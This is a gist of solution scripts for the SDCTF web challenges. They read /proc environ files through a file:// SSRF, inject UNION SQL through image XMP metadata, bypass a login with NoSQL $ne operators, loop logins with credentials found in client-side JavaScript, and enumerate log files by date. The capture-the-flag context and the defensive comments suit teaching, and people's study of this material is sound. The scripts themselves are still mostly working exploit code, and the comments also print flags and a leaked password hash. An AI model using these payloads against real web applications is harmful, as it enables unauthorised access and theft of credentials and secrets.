@DauHoangTai
Last active May 9, 2022 01:55
SDCTF web challenge solution
# python3 CurlUp.py | grep "sdctf"
import requests
from base64 import b64encode
URL = 'https://curl.sdc.tf/read/'

# The request is a JSON document, base64-encoded and appended to the /read/
# path. Its "url" field carries a file:// URI for /proc/<pid>/environ, so the
# loop asks for the environment block of PIDs 1-99 and stops at the first
# response that contains "sdctf".
# Defensive takeaway: a URL-fetching endpoint should allow-list schemes
# (http/https only) so file:// never reaches the local filesystem, and secrets
# kept in process environment variables are exposed by any local file read.
for pid in range(1, 100):
    request_doc = b'{"url":"file:///proc/%d/environ"}' % pid  # original note: id=9 (presumably the PID that matched)
    payload = b64encode(request_doc).decode("utf-8")
    response = requests.get(URL + payload)
    if "sdctf" not in response.text:
        continue
    print(response.text)
    break
import requests
import pyexiv2
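URL = 'https://dove.sdc.tf'
IMAGE_PATH = "dove.jpg"  # change to your image

# Rewrite the image's XMP dc:description field in place. The value is a
# UNION-based SQL injection string that selects the password column of
# employee_accts.
# NOTE(review): this only has an effect if the server concatenates extracted
# image metadata into a SQL statement -- the server code is not shown here.
# Defensive takeaway: file metadata is user input; bind it as a query
# parameter instead of building SQL text from it.
meta = pyexiv2.ImageMetadata(IMAGE_PATH)
meta.read()
meta['Xmp.dc.description'] = "' union select 1,(select group_concat(password) from employee_accts),3-- -"
meta.write()

# Upload the modified file as form field 'bird'. The context manager closes
# the file handle once the request has been sent (the original left it open).
with open(IMAGE_PATH, 'rb') as image:
    r = requests.post(URL + '/upload', files={'bird': image})
print(r.text)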
import requests
import sys
import random
import string
# Base address of the target web application; every request below is built
# by appending a path to it.
URL = 'https://shell.sdc.tf'
# Shared requests session used by loginAdmin, authenAdmin and getFlag, so any
# cookies set by one response are sent with the following requests.
sess = requests.Session()
def ranUser(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random string of `size` characters drawn from `chars`.

    Defaults to six characters from A-Z and 0-9. Uses the `random` module,
    which is not a cryptographic generator; in this script the value is only
    used as a throwaway account name.
    """
    picked = []
    for _ in range(size):
        picked.append(random.choice(chars))
    return ''.join(picked)
def regUser(discord, username, password):
    """POST a signup form (discord, username, password) to URL + '/signup'.

    Sent with a plain requests.post, not the shared session. The response is
    not inspected, so a failed registration goes unnoticed.
    """
    signup_form = dict(discord=discord, username=username, password=password)
    requests.post(URL + '/signup', data=signup_form)
def loginAdmin(username, password):
    """POST a login form to URL + '/login' through the shared session.

    The password is not sent as a plain `password` field; it is sent under the
    bracketed keys `password[$ne]` and `password[length]`.
    NOTE(review): presumably the server's body parser expands bracketed keys
    into a nested object, so the password reaches the database query as an
    operator object rather than a string, and `length` satisfies a length
    check -- confirm against the challenge source.
    Defensive takeaway: reject any credential field that is not a string
    before it is used in a query. The response is not inspected.
    """
    login_url = URL + '/login'
    form = {
        "username": username,
        "password[$ne]": password,
        "password[length]": "40",
    }
    sess.post(login_url, data=form)
def authenAdmin():
    """Prompt for a second-factor code and POST it to URL + '/2fa'.

    The code is read interactively from stdin and submitted on the shared
    session; the response is not inspected.
    """
    code = input("Enter the code you received: ")
    sess.post(URL + '/2fa', data={"code": code})
def getFlag():
    """GET URL + '/buyflagshell' on the shared session and print the body.

    The query string carries shell=flag-shaped-shell.
    """
    response = sess.get(URL + '/buyflagshell', params={"shell": "flag-shaped-shell"})
    print(response.text)
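def main():
    """Run the whole flow: signup, login, second factor, flag request.

    Expects one command-line argument, the Discord handle passed to signup.
    Without it, prints the usage line and exits with status 1.
    """
    if len(sys.argv) < 2:
        print("python3 HuMongous.py <your_discord>")
        # sys.exit instead of the bare exit(): the latter is injected by the
        # `site` module and is not guaranteed to exist in every interpreter.
        sys.exit(1)

    discord = sys.argv[1]
    username = ranUser()
    # Register a fresh random account under the caller's Discord handle ...
    regUser(discord, username, "taidh")
    # ... then log in as "admin" through the shared session.
    loginAdmin("admin", "taidh")
    authenAdmin()
    getFlag()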
# Run the flow only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
import requests
sess = requests.session()
URL = 'https://jawt.sdc.tf'
flag = '/s/'

# Credentials the author found in the site's client-side /js/login.js.
# Defensive takeaway: anything shipped in client-side JavaScript is readable
# by every visitor, so it must never contain working credentials.
credentials = {"username":"AzureDiamond","password":"hunter2"}  # In file /js/login.js

# Each round logs in again, requests the current path, and appends the
# response body plus '/' as the next path segment. The loop ends once a
# closing brace has been collected.
# NOTE(review): presumably the login is repeated because a token is only good
# for one fetch -- confirm against the challenge.
while '}' not in flag:
    sess.post(URL + '/login', data=credentials)
    print(flag)
    flag += sess.get(f'{URL}{flag}').text + '/'

# Strip the path separators to leave the collected characters.
print(flag.replace('/', ''))
#sdctf{Th3_m0r3_t0k3ns_the_le55_pr0bl3ms_adf3d}
from datetime import datetime
import string
import requests
import datetime
URL = 'https://logs.sdc.tf/logs/'
CHECK = ['flag','sdctf','password','pass','passwd','admin']

# Walk every calendar date from 2016 through 2022 and fetch
# <year>/<month>/<day>/<weekday>.log, where <weekday> is strftime("%a") for
# that date. Stop at the first log whose text contains a CHECK keyword in
# Capitalized or UPPER form (all-lowercase matches are not tested).
# `datetime.datetime` here relies on `import datetime` being the binding in
# effect, since the file also has `from datetime import datetime` above it.
# Defensive takeaway: log files served at predictable date-based paths can be
# enumerated; keep logs behind authentication and keep secrets out of them.
for year in range(2016, 2023):
    for month in range(1, 13):
        for day in range(1, 32):
            try:
                # Impossible dates (e.g. day 31 of a 30-day month) raise here
                # and are reported by the handler below.
                weekday = datetime.datetime(year, month, day).strftime("%a")
                log_url = URL + f'{year}/{month}/{day}/{weekday}.log'
                print(log_url)
                body = requests.get(log_url).text
                if any(k.capitalize() in body or k.upper() in body for k in CHECK):
                    print(body)
                    print(log_url)
                    exit()
            except Exception as e:
                # Best-effort scan: print the error (invalid date, network
                # failure) and move on to the next date.
                print(e)
#https://logs.sdc.tf/logs/2018/6/13/Wed.log
# nc logger.sdc.tf 1338
#Pass: 82d192aa35a6298997e9456cb3a0b5dd92e4d6411c56af2169bed167b53f38d
#sdctf{b3tr4y3d_by_th3_l0gs_8a4dfd}